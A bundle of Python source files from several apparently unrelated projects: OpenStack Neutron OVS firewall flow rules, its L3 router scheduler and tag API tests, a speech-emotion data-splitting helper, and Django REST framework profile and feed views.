[constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]: self._add_flow( table=ovs_consts.RULES_EGRESS_TABLE, priority=40, dl_type=ethertype, reg_port=port.ofport, ct_state=ovsfw_consts.OF_STATE_ESTABLISHED, actions="ct(commit,zone=NXM_NX_REG{:d}[0..15]," "exec(set_field:{:s}->ct_mark))".format( ovsfw_consts.REG_NET, ovsfw_consts.CT_MARK_INVALID) ) def _initialize_ingress_ipv6_icmp(self, port): for icmp_type in firewall.ICMPV6_ALLOWED_TYPES: self._add_flow( table=ovs_consts.BASE_INGRESS_TABLE, priority=100, reg_port=port.ofport, dl_dst=port.mac, dl_type=constants.ETHERTYPE_IPV6, nw_proto=lib_const.PROTO_NUM_IPV6_ICMP, icmp_type=icmp_type, actions='strip_vlan,output:{:d}'.format(port.ofport), ) def _initialize_ingress(self, port): # Allow incoming ARPs self._add_flow( table=ovs_consts.BASE_INGRESS_TABLE, priority=100, dl_type=constants.ETHERTYPE_ARP, reg_port=port.ofport, dl_dst=port.mac, actions='strip_vlan,output:{:d}'.format(port.ofport), ) self._initialize_ingress_ipv6_icmp(port) # DHCP offers for dl_type, src_port, dst_port in ( (constants.ETHERTYPE_IP, 67, 68), (constants.ETHERTYPE_IPV6, 547, 546)): self._add_flow( table=ovs_consts.BASE_INGRESS_TABLE, priority=95, reg_port=port.ofport, dl_type=dl_type, nw_proto=lib_const.PROTO_NUM_UDP, tp_src=src_port, tp_dst=dst_port, actions='strip_vlan,output:{:d}'.format(port.ofport), ) # Track untracked for dl_type in (constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6): self._add_flow( table=ovs_consts.BASE_INGRESS_TABLE, priority=90, reg_port=port.ofport, dl_type=dl_type, ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED, actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format( ovs_consts.RULES_INGRESS_TABLE, ovsfw_consts.REG_NET) ) self._add_flow( table=ovs_consts.BASE_INGRESS_TABLE, ct_state=ovsfw_consts.OF_STATE_TRACKED, priority=80, reg_port=port.ofport, dl_dst=port.mac, actions='resubmit(,{:d})'.format(ovs_consts.RULES_INGRESS_TABLE) ) def _initialize_tracked_ingress(self, port): # Drop invalid packets self._add_flow( table=ovs_consts.RULES_INGRESS_TABLE, priority=50, ct_state=ovsfw_consts.OF_STATE_INVALID, actions='drop' ) # Drop traffic for removed sg rules self._add_flow( table=ovs_consts.RULES_INGRESS_TABLE, priority=50, reg_port=port.ofport, ct_mark=ovsfw_consts.CT_MARK_INVALID, actions='drop' ) # Allow established and related connections for state in (ovsfw_consts.OF_STATE_ESTABLISHED_REPLY, ovsfw_consts.OF_STATE_RELATED): self._add_flow( table=ovs_consts.RULES_INGRESS_TABLE, priority=50, dl_dst=port.mac, reg_port=port.ofport, ct_state=state, ct_mark=ovsfw_consts.CT_MARK_NORMAL, ct_zone=port.vlan_tag, actions='strip_vlan,output:{:d}'.format(port.ofport) ) self._add_flow( table=ovs_consts.RULES_INGRESS_TABLE, priority=40, reg_port=port.ofport, ct_state=ovsfw_consts.OF_STATE_NOT_ESTABLISHED, actions='drop' ) for ethertype in [constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]: self._add_flow( table=ovs_consts.RULES_INGRESS_TABLE, priority=40, dl_type=ethertype, reg_port=port.ofport, ct_state=ovsfw_consts.OF_STATE_ESTABLISHED, actions="ct(commit,zone=NXM_NX_REG{:d}[0..15]," "exec(set_field:{:s}->ct_mark))".format( ovsfw_consts.REG_NET, ovsfw_consts.CT_MARK_INVALID) ) def add_flows_from_rules(self, port): self._initialize_tracked_ingress(port) self._initialize_tracked_egress(port) LOG.debug('Creating flow rules for port %s that is port %d in OVS', port.id, port.ofport) rules_generator = self.create_rules_generator_for_port(port) for rule in rules_generator: flows = rules.create_flows_from_rule_and_port(rule, port) LOG.debug("RULGEN: Rules generated for flow %s are %s", rule, flows) for flow in flows: self._accept_flow(**flow) def create_rules_generator_for_port(self, port): for sec_group in port.sec_groups: for rule in sec_group.raw_rules: yield rule for rule in sec_group.remote_rules: remote_group = self.sg_port_map.sec_groups[ rule['remote_group_id']] for ip_addr in remote_group.get_ethertype_filtered_addresses( rule['ethertype'], port.fixed_ips): yield rules.create_rule_for_ip_address(ip_addr, rule) def delete_all_port_flows(self, port): """Delete all flows for given port""" self._delete_flows(table=ovs_consts.LOCAL_SWITCHING, dl_dst=port.mac) self._delete_flows(table=ovs_consts.LOCAL_SWITCHING, in_port=port.ofport) self._delete_flows(reg_port=port.ofport) self._delete_flows(table=ovs_consts.ACCEPT_OR_INGRESS_TABLE, dl_dst=port.mac) ``` #### File: neutron/scheduler/l3_agent_scheduler.py ```python import abc import collections import functools import itertools import random from neutron_lib import constants as lib_const from oslo_config import cfg from oslo_db import exception as db_exc from oslo_log import log as logging import six from sqlalchemy import sql from neutron._i18n import _LE, _LW from neutron.common import utils from neutron.db import api as db_api from neutron.db import l3_hamode_db from neutron.db.models import l3 as l3_models from neutron.db.models import l3agent as rb_model from neutron.extensions import availability_zone as az_ext from neutron.extensions import l3 LOG = logging.getLogger(__name__) cfg.CONF.register_opts(l3_hamode_db.L3_HA_OPTS) @six.add_metaclass(abc.ABCMeta) class L3Scheduler(object): def __init__(self): self.min_ha_agents = cfg.CONF.min_l3_agents_per_router self.max_ha_agents = cfg.CONF.max_l3_agents_per_router @abc.abstractmethod def schedule(self, plugin, context, router_id, candidates=None, hints=None): """Schedule the router to an active L3 agent. Schedule the router only if it is not already scheduled. """ pass def _router_has_binding(self, context, router_id, l3_agent_id): router_binding_model = rb_model.RouterL3AgentBinding query = context.session.query(router_binding_model) query = query.filter(router_binding_model.router_id == router_id, router_binding_model.l3_agent_id == l3_agent_id) return query.count() > 0 def _filter_unscheduled_routers(self, plugin, context, routers): """Filter from list of routers the ones that are not scheduled.""" unscheduled_routers = [] for router in routers: l3_agents = plugin.get_l3_agents_hosting_routers( context, [router['id']]) if l3_agents: LOG.debug('Router %(router_id)s has already been ' 'hosted by L3 agent %(agent_id)s', {'router_id': router['id'], 'agent_id': l3_agents[0]['id']}) else: unscheduled_routers.append(router) return unscheduled_routers def _get_unscheduled_routers(self, plugin, context): """Get routers with no agent binding.""" # TODO(gongysh) consider the disabled agent's router no_agent_binding = ~sql.exists().where( l3_models.Router.id == rb_model.RouterL3AgentBinding.router_id) query = context.session.query( l3_models.Router.id).filter(no_agent_binding) unscheduled_router_ids = [router_id_[0] for router_id_ in query] if unscheduled_router_ids: return plugin.get_routers( context, filters={'id': unscheduled_router_ids}) return [] def _get_routers_to_schedule(self, plugin, context, router_ids=None): """Verify that the routers specified need to be scheduled. :param context: the context :param plugin: the core plugin :param router_ids: the list of routers to be checked for scheduling :returns: the list of routers to be scheduled """ if router_ids is not None: filters = {'id': router_ids} routers = plugin.get_routers(context, filters=filters) result = self._filter_unscheduled_routers(plugin, context, routers) else: result = self._get_unscheduled_routers(plugin, context) return [r for r in result if plugin.router_supports_scheduling(context, r['id'])] def _get_routers_can_schedule(self, plugin, context, routers, l3_agent): """Get the subset of routers that can be scheduled on the L3 agent.""" ids_to_discard = set() for router in routers: # check if the l3 agent is compatible with the router candidates = plugin.get_l3_agent_candidates( context, router, [l3_agent]) if not candidates: ids_to_discard.add(router['id']) return [r for r in routers if r['id'] not in ids_to_discard] def auto_schedule_routers(self, plugin, context, host, router_ids): """Schedule non-hosted routers to L3 Agent running on host. If router_ids is given, each router in router_ids is scheduled if it is not scheduled yet. Otherwise all unscheduled routers are scheduled. Do not schedule the routers which are hosted already by active l3 agents. :returns: True if routers have been successfully assigned to host """ l3_agent = plugin.get_enabled_agent_on_host( context, lib_const.AGENT_TYPE_L3, host) if not l3_agent: return unscheduled_routers = self._get_routers_to_schedule( plugin, context, router_ids) if not unscheduled_routers: if utils.is_extension_supported( plugin, lib_const.L3_HA_MODE_EXT_ALIAS): self._schedule_ha_routers_to_additional_agent( plugin, context, l3_agent) return target_routers = self._get_routers_can_schedule( plugin, context, unscheduled_routers, l3_agent) if not target_routers: LOG.warning(_LW('No routers compatible with L3 agent ' 'configuration on host %s'), host) return self._bind_routers(plugin, context, target_routers, l3_agent) def _get_candidates(self, plugin, context, sync_router): """Return L3 agents where a router could be scheduled.""" with context.session.begin(subtransactions=True): # allow one router is hosted by just # one enabled l3 agent hosting since active is just a # timing problem. Non-active l3 agent can return to # active any time current_l3_agents = plugin.get_l3_agents_hosting_routers( context, [sync_router['id']], admin_state_up=True) if current_l3_agents: LOG.debug('Router %(router_id)s has already been hosted ' 'by L3 agent %(agent_id)s', {'router_id': sync_router['id'], 'agent_id': current_l3_agents[0]['id']}) return [] active_l3_agents = plugin.get_l3_agents(context, active=True) if not active_l3_agents: LOG.warning(_LW('No active L3 agents')) return [] candidates = plugin.get_l3_agent_candidates(context, sync_router, active_l3_agents) if not candidates: LOG.warning(_LW('No L3 agents can host the router %s'), sync_router['id']) return candidates def _bind_routers(self, plugin, context, routers, l3_agent): for router in routers: if router.get('ha'): if not self._router_has_binding(context, router['id'], l3_agent.id): self.create_ha_port_and_bind( plugin, context, router['id'], router['tenant_id'], l3_agent) else: self.bind_router(plugin, context, router['id'], l3_agent.id) @db_api.retry_db_errors def bind_router(self, plugin, context, router_id, agent_id, is_manual_scheduling=False, is_ha=False): """Bind the router to the l3 agent which has been chosen. The function tries to create a RouterL3AgentBinding object and add it to the database. It returns the binding that was created or None if it failed to create it due to some conflict. In the HA router case, when creating a RouterL3AgentBinding (with some binding_index) fails because some other RouterL3AgentBinding was concurrently created using the same binding_index, then the function will retry to create an entry with a new binding_index. This creation will be retried up to db_api.MAX_RETRIES times. If, still in the HA router case, the creation failed because the router has already been bound to the l3 agent in question or has been removed (by a concurrent operation), then no further attempts will be made and the function will return None. Note that for non-HA routers, the function will always perform exactly one try, regardless of the error preventing the addition of a new RouterL3AgentBinding object to the database. """ bindings = context.session.query( rb_model.RouterL3AgentBinding).filter_by(router_id=router_id) if bindings.filter_by(l3_agent_id=agent_id).first(): LOG.debug('Router %(router_id)s has already been scheduled ' 'to L3 agent %(agent_id)s.', {'router_id': router_id, 'agent_id': agent_id}) return if not is_ha: binding_index = rb_model.LOWEST_BINDING_INDEX if bindings.filter_by(binding_index=binding_index).first(): LOG.debug('Non-HA router %s has already been scheduled', router_id) return else: binding_index = plugin.get_vacant_binding_index( context, router_id, is_manual_scheduling) if binding_index < rb_model.LOWEST_BINDING_INDEX: LOG.debug('Unable to find a vacant binding_index for ' 'router %(router_id)s and agent %(agent_id)s', {'router_id': router_id, 'agent_id': agent_id}) return try: with context.session.begin(subtransactions=True): binding = rb_model.RouterL3AgentBinding() binding.l3_agent_id = agent_id binding.router_id = router_id binding.binding_index = binding_index context.session.add(binding) LOG.debug('Router %(router_id)s is scheduled to L3 agent ' '%(agent_id)s with binding_index %(binding_index)d', {'router_id': router_id, 'agent_id': agent_id, 'binding_index': binding_index}) return binding except db_exc.DBReferenceError: LOG.debug('Router %s has already been removed ' 'by concurrent operation', router_id) def _schedule_router(self, plugin, context, router_id, candidates=None): if not plugin.router_supports_scheduling(context, router_id): return sync_router = plugin.get_router(context, router_id) candidates = candidates or self._get_candidates( plugin, context, sync_router) if not candidates: return elif sync_router.get('ha', False): chosen_agents = self._bind_ha_router(plugin, context, router_id, sync_router.get('tenant_id'), candidates) if not chosen_agents: return chosen_agent = chosen_agents[-1] else: chosen_agent = self._choose_router_agent( plugin, context, candidates) self.bind_router(plugin, context, router_id, chosen_agent.id) return chosen_agent @abc.abstractmethod def _choose_router_agent(self, plugin, context, candidates): """Choose an agent from candidates based on a specific policy.""" pass @abc.abstractmethod def _choose_router_agents_for_ha(self, plugin, context, candidates): """Choose agents from candidates based on a specific policy.""" pass def _get_num_of_agents_for_ha(self, candidates_count): return (min(self.max_ha_agents, candidates_count) if self.max_ha_agents else candidates_count) def _enough_candidates_for_ha(self, candidates): if not candidates or len(candidates) < self.min_ha_agents: LOG.error(_LE("Not enough candidates, a HA router needs at least " "%s agents"), self.min_ha_agents) return False return True def _add_port_from_net_and_ensure_vr_id(self, plugin, ctxt, router_db, tenant_id, ha_net): plugin._ensure_vr_id(ctxt, router_db, ha_net) return plugin.add_ha_port(ctxt, router_db.id, ha_net.network.id, tenant_id) def create_ha_port_and_bind(self, plugin, context, router_id, tenant_id, agent, is_manual_scheduling=False): """Creates and binds a new HA port for this agent.""" ctxt = context.elevated() router_db = plugin._get_router(ctxt, router_id) creator = functools.partial(self._add_port_from_net_and_ensure_vr_id, plugin, ctxt, router_db, tenant_id) dep_getter = functools.partial(plugin.get_ha_network, ctxt, tenant_id) dep_creator = functools.partial(plugin._create_ha_network, ctxt, tenant_id) dep_deleter = functools.partial(plugin._delete_ha_network, ctxt) dep_id_attr = 'network_id' # This might fail in case of concurrent calls, which is good for us # as we can skip the rest of this function. binding = self.bind_router( plugin, context, router_id, agent['id'], is_manual_scheduling=is_manual_scheduling, is_ha=True) if not binding: return try: port_binding = utils.create_object_with_dependency( creator, dep_getter, dep_creator, dep_id_attr, dep_deleter)[0] with db_api.autonested_transaction(context.session): port_binding.l3_agent_id = agent['id'] except db_exc.DBDuplicateEntry: LOG.debug("Router %(router)s already scheduled for agent " "%(agent)s", {'router': router_id, 'agent': agent['id']}) except l3.RouterNotFound: LOG.debug('Router %s has already been removed ' 'by concurrent operation', router_id) def get_ha_routers_l3_agents_counts(self, plugin, context, filters=None): """Return a mapping (router, # agents) matching specified filters.""" return plugin.get_ha_routers_l3_agents_count(context) def _schedule_ha_routers_to_additional_agent(self, plugin, context, agent): """Bind already scheduled routers to the agent. Retrieve the number of agents per router and check if the router has to be scheduled on the given agent if max_l3_agents_per_router is not yet reached. """ routers_agents = self.get_ha_routers_l3_agents_counts(plugin, context, agent) admin_ctx = context.elevated() underscheduled_routers = [router for router, agents in routers_agents if (not self.max_ha_agents or agents < self.max_ha_agents)] schedulable_routers = self._get_routers_can_schedule( plugin, admin_ctx, underscheduled_routers, agent) for router in schedulable_routers: if not self._router_has_binding(admin_ctx, router['id'], agent.id): self.create_ha_port_and_bind(plugin, admin_ctx, router['id'], router['tenant_id'], agent) def _bind_ha_router(self, plugin, context, router_id, tenant_id, candidates): """Bind a HA router to agents based on a specific policy.""" if not self._enough_candidates_for_ha(candidates): return chosen_agents = self._choose_router_agents_for_ha( plugin, context, candidates) for agent in chosen_agents: self.create_ha_port_and_bind(plugin, context, router_id, tenant_id, agent) return chosen_agents class ChanceScheduler(L3Scheduler): """Randomly allocate an L3 agent for a router.""" def schedule(self, plugin, context, router_id, candidates=None): return self._schedule_router( plugin, context, router_id, candidates=candidates) def _choose_router_agent(self, plugin, context, candidates): return random.choice(candidates) def _choose_router_agents_for_ha(self, plugin, context, candidates): num_agents = self._get_num_of_agents_for_ha(len(candidates)) return random.sample(candidates, num_agents) class LeastRoutersScheduler(L3Scheduler): """Allocate to an L3 agent with the least number of routers bound.""" def schedule(self, plugin, context, router_id, candidates=None): return self._schedule_router( plugin, context, router_id, candidates=candidates) def _choose_router_agent(self, plugin, context, candidates): candidate_ids = [candidate['id'] for candidate in candidates] chosen_agent = plugin.get_l3_agent_with_min_routers( context, candidate_ids) return chosen_agent def _choose_router_agents_for_ha(self, plugin, context, candidates): num_agents = self._get_num_of_agents_for_ha(len(candidates)) ordered_agents = plugin.get_l3_agents_ordered_by_num_routers( context, [candidate['id'] for candidate in candidates]) return ordered_agents[:num_agents] class AZLeastRoutersScheduler(LeastRoutersScheduler): """Availability zone aware scheduler. If a router is ha router, allocate L3 agents distributed AZs according to router's az_hints. """ def _get_az_hints(self, router): return (router.get(az_ext.AZ_HINTS) or cfg.CONF.default_availability_zones) def _get_routers_can_schedule(self, plugin, context, routers, l3_agent): """Overwrite L3Scheduler's method to filter by availability zone.""" target_routers = [] for r in routers: az_hints = self._get_az_hints(r) if not az_hints or l3_agent['availability_zone'] in az_hints: target_routers.append(r) if not target_routers: return [] return super(AZLeastRoutersScheduler, self)._get_routers_can_schedule( plugin, context, target_routers, l3_agent) def _get_candidates(self, plugin, context, sync_router): """Overwrite L3Scheduler's method to filter by availability zone.""" all_candidates = ( super(AZLeastRoutersScheduler, self)._get_candidates( plugin, context, sync_router)) candidates = [] az_hints = self._get_az_hints(sync_router) for agent in all_candidates: if not az_hints or agent['availability_zone'] in az_hints: candidates.append(agent) return candidates def get_ha_routers_l3_agents_counts(self, plugin, context, filters=None): """Overwrite L3Scheduler's method to filter by availability zone.""" all_routers_agents = ( super(AZLeastRoutersScheduler, self). get_ha_routers_l3_agents_counts(plugin, context, filters)) if filters is None: return all_routers_agents routers_agents = [] for router, agents in all_routers_agents: az_hints = self._get_az_hints(router) if az_hints and filters['availability_zone'] not in az_hints: continue routers_agents.append((router, agents)) return routers_agents def _choose_router_agents_for_ha(self, plugin, context, candidates): ordered_agents = plugin.get_l3_agents_ordered_by_num_routers( context, [candidate['id'] for candidate in candidates]) num_agents = self._get_num_of_agents_for_ha(len(ordered_agents)) # Order is kept in each az group_by_az = collections.defaultdict(list) for agent in ordered_agents: az = agent['availability_zone'] group_by_az[az].append(agent) selected_agents = [] for az, agents in itertools.cycle(group_by_az.items()): if not agents: continue selected_agents.append(agents.pop(0)) if len(selected_agents) >= num_agents: break return selected_agents ``` #### File: unit/extensions/test_tag.py ```python from neutron.api import extensions from neutron.common import config import neutron.extensions from neutron.services.tag import tag_plugin from neutron.tests import fake_notifier from neutron.tests.unit.db import test_db_base_plugin_v2 extensions_path = ':'.join(neutron.extensions.__path__) class TestTagApiBase(test_db_base_plugin_v2.NeutronDbPluginV2TestCase): def setUp(self): service_plugins = {'TAG': "neutron.services.tag.tag_plugin.TagPlugin"} super(TestTagApiBase, self).setUp(service_plugins=service_plugins) plugin = tag_plugin.TagPlugin() ext_mgr = extensions.PluginAwareExtensionManager( extensions_path, {'TAG': plugin} ) app = config.load_paste_app('extensions_test_app') self.ext_api = extensions.ExtensionMiddleware(app, ext_mgr=ext_mgr) def _get_resource_tags(self, resource_id): res = self._show(self.resource, resource_id) return res[self.member]['tags'] def _put_tag(self, resource_id, tag): req = self._req('PUT', self.resource, id=resource_id, subresource='tags', sub_id=tag) return req.get_response(self.ext_api) def _put_tags(self, resource_id, tags): body = {'tags': tags} req = self._req('PUT', self.resource, data=body, id=resource_id, subresource='tags') return req.get_response(self.ext_api) def _get_tag(self, resource_id, tag): req = self._req('GET', self.resource, id=resource_id, subresource='tags', sub_id=tag) return req.get_response(self.ext_api) def _delete_tag(self, resource_id, tag): req = self._req('DELETE', self.resource, id=resource_id, subresource='tags', sub_id=tag) return req.get_response(self.ext_api) def _delete_tags(self, resource_id): req = self._req('DELETE', self.resource, id=resource_id, subresource='tags') return req.get_response(self.ext_api) def _assertEqualTags(self, expected, actual): self.assertEqual(set(expected), set(actual)) def _make_query_string(self, tags, tags_any, not_tags, not_tags_any): filter_strings = [] if tags: filter_strings.append("tags=" + ','.join(tags)) if tags_any: filter_strings.append("tags-any=" + ','.join(tags_any)) if not_tags: filter_strings.append("not-tags=" + ','.join(not_tags)) if not_tags_any: filter_strings.append("not-tags-any=" + ','.join(not_tags_any)) return '&'.join(filter_strings) def _get_tags_filter_resources(self, tags=None, tags_any=None, not_tags=None, not_tags_any=None): params = self._make_query_string(tags, tags_any, not_tags, not_tags_any) req = self._req('GET', self.resource, params=params) res = req.get_response(self.api) res = self.deserialize(self.fmt, res) return res[self.resource] def _test_notification_report(self, expect_notify): notify = set(n['event_type'] for n in fake_notifier.NOTIFICATIONS) duplicated_notify = expect_notify & notify self.assertEqual(expect_notify, duplicated_notify) fake_notifier.reset() class TestNetworkTagApi(TestTagApiBase): resource = 'networks' member = 'network' def test_put_tag(self): expect_notify = set(['tag.create.start', 'tag.create.end']) with self.network() as net: net_id = net['network']['id'] res = self._put_tag(net_id, 'red') self.assertEqual(201, res.status_int) tags = self._get_resource_tags(net_id) self._assertEqualTags(['red'], tags) self._test_notification_report(expect_notify) res = self._put_tag(net_id, 'blue') self.assertEqual(201, res.status_int) tags = self._get_resource_tags(net_id) self._assertEqualTags(['red', 'blue'], tags) self._test_notification_report(expect_notify) def test_put_tag_exists(self): with self.network() as net: net_id = net['network']['id'] res = self._put_tag(net_id, 'blue') self.assertEqual(201, res.status_int) res = self._put_tag(net_id, 'blue') self.assertEqual(201, res.status_int) def test_put_tags(self): expect_notify = set(['tag.update.start', 'tag.update.end']) with self.network() as net: net_id = net['network']['id'] res = self._put_tags(net_id, ['red', 'green']) self.assertEqual(200, res.status_int) tags = self._get_resource_tags(net_id) self._assertEqualTags(['red', 'green'], tags) self._test_notification_report(expect_notify) def test_put_tags_replace(self): with self.network() as net: net_id = net['network']['id'] res = self._put_tags(net_id, ['red', 'green']) self.assertEqual(200, res.status_int) tags = self._get_resource_tags(net_id) self._assertEqualTags(['red', 'green'], tags) res = self._put_tags(net_id, ['blue', 'red']) self.assertEqual(200, res.status_int) tags = self._get_resource_tags(net_id) self._assertEqualTags(['blue', 'red'], tags) def test_get_tag(self): with self.network() as net: net_id = net['network']['id'] res = self._put_tag(net_id, 'red') self.assertEqual(201, res.status_int) res = self._get_tag(net_id, 'red') self.assertEqual(204, res.status_int) def test_get_tag_notfound(self): with self.network() as net: net_id = net['network']['id'] res = self._put_tag(net_id, 'red') self.assertEqual(201, res.status_int) res = self._get_tag(net_id, 'green') self.assertEqual(404, res.status_int) def test_delete_tag(self): expect_notify = set(['tag.delete.start', 'tag.delete.end']) with self.network() as net: net_id = net['network']['id'] res = self._put_tags(net_id, ['red', 'green']) self.assertEqual(200, res.status_int) res = self._delete_tag(net_id, 'red') self.assertEqual(204, res.status_int) tags = self._get_resource_tags(net_id) self._assertEqualTags(['green'], tags) self._test_notification_report(expect_notify) def test_delete_tag_notfound(self): with self.network() as net: net_id = net['network']['id'] res = self._put_tags(net_id, ['red', 'green']) self.assertEqual(200, res.status_int) res = self._delete_tag(net_id, 'blue') self.assertEqual(404, res.status_int) def test_delete_tags(self): expect_notify = set(['tag.delete_all.start', 'tag.delete_all.end']) with self.network() as net: net_id = net['network']['id'] res = self._put_tags(net_id, ['red', 'green']) self.assertEqual(200, res.status_int) res = self._delete_tags(net_id) self.assertEqual(204, res.status_int) tags = self._get_resource_tags(net_id) self._assertEqualTags([], tags) self._test_notification_report(expect_notify) class TestNetworkTagFilter(TestTagApiBase): resource = 'networks' member = 'network' def setUp(self): super(TestNetworkTagFilter, self).setUp() self._prepare_network_tags() def _prepare_network_tags(self): res = self._make_network(self.fmt, 'net1', True) net1_id = res['network']['id'] res = self._make_network(self.fmt, 'net2', True) net2_id = res['network']['id'] res = self._make_network(self.fmt, 'net3', True) net3_id = res['network']['id'] res = self._make_network(self.fmt, 'net4', True) net4_id = res['network']['id'] res = self._make_network(self.fmt, 'net5', True) net5_id = res['network']['id'] self._put_tags(net1_id, ['red']) self._put_tags(net2_id, ['red', 'blue']) self._put_tags(net3_id, ['red', 'blue', 'green']) self._put_tags(net4_id, ['green']) # net5: no tags tags = self._get_resource_tags(net5_id) self._assertEqualTags([], tags) def _assertEqualResources(self, expected, res): actual = [n['name'] for n in res] self.assertEqual(set(expected), set(actual)) def test_filter_tags_single(self): res = self._get_tags_filter_resources(tags=['red']) self._assertEqualResources(['net1', 'net2', 'net3'], res) def test_filter_tags_multi(self): res = self._get_tags_filter_resources(tags=['red', 'blue']) self._assertEqualResources(['net2', 'net3'], res) def test_filter_tags_any_single(self): res = self._get_tags_filter_resources(tags_any=['blue']) self._assertEqualResources(['net2', 'net3'], res) def test_filter_tags_any_multi(self): res = self._get_tags_filter_resources(tags_any=['red', 'blue']) self._assertEqualResources(['net1', 'net2', 'net3'], res) def test_filter_not_tags_single(self): res = self._get_tags_filter_resources(not_tags=['red']) self._assertEqualResources(['net4', 'net5'], res) def test_filter_not_tags_multi(self): res = self._get_tags_filter_resources(not_tags=['red', 'blue']) self._assertEqualResources(['net1', 'net4', 'net5'], res) def test_filter_not_tags_any_single(self): res = self._get_tags_filter_resources(not_tags_any=['blue']) self._assertEqualResources(['net1', 'net4', 'net5'], res) def test_filter_not_tags_any_multi(self): res = self._get_tags_filter_resources(not_tags_any=['red', 'blue']) self._assertEqualResources(['net4', 'net5'], res) ```
{ "source": "2020-ICT-insdeout/ICT-insideout", "score": 3 }
#### File: ICT-insideout/examples/common.py ```python import numpy as np from sklearn.model_selection import train_test_split from utilities_test import get_data, \ get_feature_vector_from_mfcc _DATA_PATH = '../korean_dataset' _CLASS_LABELS = ("angry", "disappoint", "fear", "neutral", "sad", "surrender") def extract_data(flatten): data, labels = get_data(_DATA_PATH, class_labels=_CLASS_LABELS, flatten=flatten) x_train, x_test, y_train, y_test = train_test_split( data, labels, test_size=0.2, random_state=42) return np.array(x_train), np.array(x_test), np.array(y_train), np.array( y_test), len(_CLASS_LABELS) def get_feature_vector(file_path, flatten): return get_feature_vector_from_mfcc(file_path, flatten, mfcc_len=39) ```
{ "source": "2020lg/project-rest-api", "score": 3 }
#### File: project-rest-api/profiles_api/views.py ```python from rest_framework.views import APIView from rest_framework.response import Response # standard Response object that's returned when from APIView from rest_framework import status from rest_framework import viewsets from rest_framework.authentication import TokenAuthentication # token authentication is a type of authentication we use # for users to authenticate themselves with our API. # It works by generating a random token string when the user logs in # and then every request we make to that API that we need to authenticate # we add this token string to the request ie it's effectively a password # to check that every request that's made is authenticated correctly from rest_framework import filters from rest_framework.authtoken.views import ObtainAuthToken # DRF comes with an Auth Token view out the box from rest_framework.settings import api_settings from rest_framework.permissions import IsAuthenticated # blocks access to the entire endpoint unless the user is authenticated from profiles_api import serializers from profiles_api import models from profiles_api import permissions class HelloApiView(APIView): # creates a new class based on APIView class that Django REST framework provides # allows us to define the application logic for our endpoint that we are going to # assign to this view. You define a URL which is our endpoint and then you assign # this view and DJango REST framework handles it by callin gthe appropriate function # in the view HTTP request you make. """Test API View""" serializer_class = serializers.HelloSerializer def get(self, request, format=None): """Returns a list of APIView features""" an_apiview = [ 'Uses HTTP method as function (get, post, patch, put, delete)', 'Is similar to a traditional Django View', 'Gives you the most control over your application logic', 'Is mapped manually to URLs', ] return Response({'message': 'Hello!', 'an_apiview': an_apiview}) # Response needs to contain a dict or list because it converts Response into JSON def post(self, request): """Create a hello message with our name""" serializer = self.serializer_class(data=request.data) if serializer.is_valid(): name = serializer.validated_data.get('name') # retrieves the name field message = f'Hello {name}' return Response({'message': message}) else: return Response( serializer.errors, status=status.HTTP_400_BAD_REQUEST ) def put(self, request, pk=None): # usually has an id (primary key) of an object you are updating """Handle updating an entire object""" return Response({'method': 'PUT'}) def patch(self, request, pk=None): """ Handle a partial update of an object, based on the fields provided in the request """ return Response({'method': 'PATCH'}) def delete(self, request, pk=None): """Delete an object""" return Response({'method': 'DELETE'}) class HelloViewSet(viewsets.ViewSet): """Test API ViewSet""" serializer_class = serializers.HelloSerializer def list(self, request): """Return a hello message""" a_viewset = [ 'Uses actions (list, create, retrieve, update, partial_update)', 'Automatically maps to URLs using Routers', 'Provides more functionality with less code' ] return Response({'message': 'Hello!', 'a_viewset': a_viewset}) def create(self, request): """Create a new hello message""" serializer = self.serializer_class(data=request.data) if serializer.is_valid(): name = serializer.validated_data.get('name') message = f'Hello {name}!' return Response({'message': message}) else: return Response( serializer.errors, status=status.HTTP_400_BAD_REQUEST ) def retrieve(self, request, pk=None): """Handle getting an object by its ID""" return Response({'http_method': 'GET'}) def update(self, request, pk=None): """Handle updating an object""" return Response({'http_method': 'PUT'}) def partial_update(self, request, pk=None): """Handle updating part of an object""" return Response({'http_method': 'PATCH'}) def destroy(self, request, pk=None): """Handle removing an object""" return Response({'http_method': 'DELETE'}) class UserProfileViewSet(viewsets.ModelViewSet): # ModelViewSet is specifically designed for managing models through our API """Handle creating and updating profiles""" serializer_class = serializers.UserProfileSerializer queryset = models.UserProfile.objects.all() # DRF knows the standard functions that you would want to perform on ModelViewSet: create, list, update, partial_update, destroy. # DRF takes care of all that by assigning a a serializer_class to a model Serializer and queryset authentication_classes = (TokenAuthentication,) # tuple, you can add all authentication classes here, but we'll be using AuthToken permission_classes = (permissions.UpdateOwnProfile,) filter_backends = (filters.SearchFilter,) # tuple search_fields = ('name', 'email',) # searchable fields class UserLoginApiView(ObtainAuthToken): """Handle creating user authentication tokens""" renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES # ObtainAuthToken class doesn't by default enable itself in the browsable Django admin site. # So we need to overwrite this class and customize it so it's visible in the browsable API # and it makes us easier for us to test. We need to add renderer_classes manually. class UserProfileFeedViewSet(viewsets.ModelViewSet): """Handles creating, reading and updating profile feed items""" authentication_classes = (TokenAuthentication,) serializer_class = serializers.ProfileFeedItemSerializer queryset = models.ProfileFeedItem.objects.all() permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated) def perform_create(self, serializer): # DRF's function that allows you to customize the behavior for creating objects through a model ViewSet. When a request gets made to our ViewSet, it gets passed to our serializer class and validated, and then the serializer.save() is called by default. """Sets the user profile to the logged-in user""" serializer.save(user_profile=self.request.user) # when a new object is created (HTTP POST call), DRF calls perform_create() and it passes in the serializer that we are using to create the object. # The serializer is a model serializer so it has a save() function assigned to it. That save() function is used to save the contents of the serializer to an object in the DB. # We are calling serializer.save() and we are passing in an additional keyword for the 'user_profile'. This gets passed in in addition to all the items in the serializer that've benn validated. # Request object is an object that gets passed into all viewsets every time a request is made. # Request contains all the details about the request being made to the viewset. # If the user has authenticated, then the request has a user associated to the authenticated user. So the user field is added whenever the user is authenticated. # If the user is not authenticated, it's just set to an anonymous user account. ```
{ "source": "2020-nyu-devops/promotions", "score": 2 }
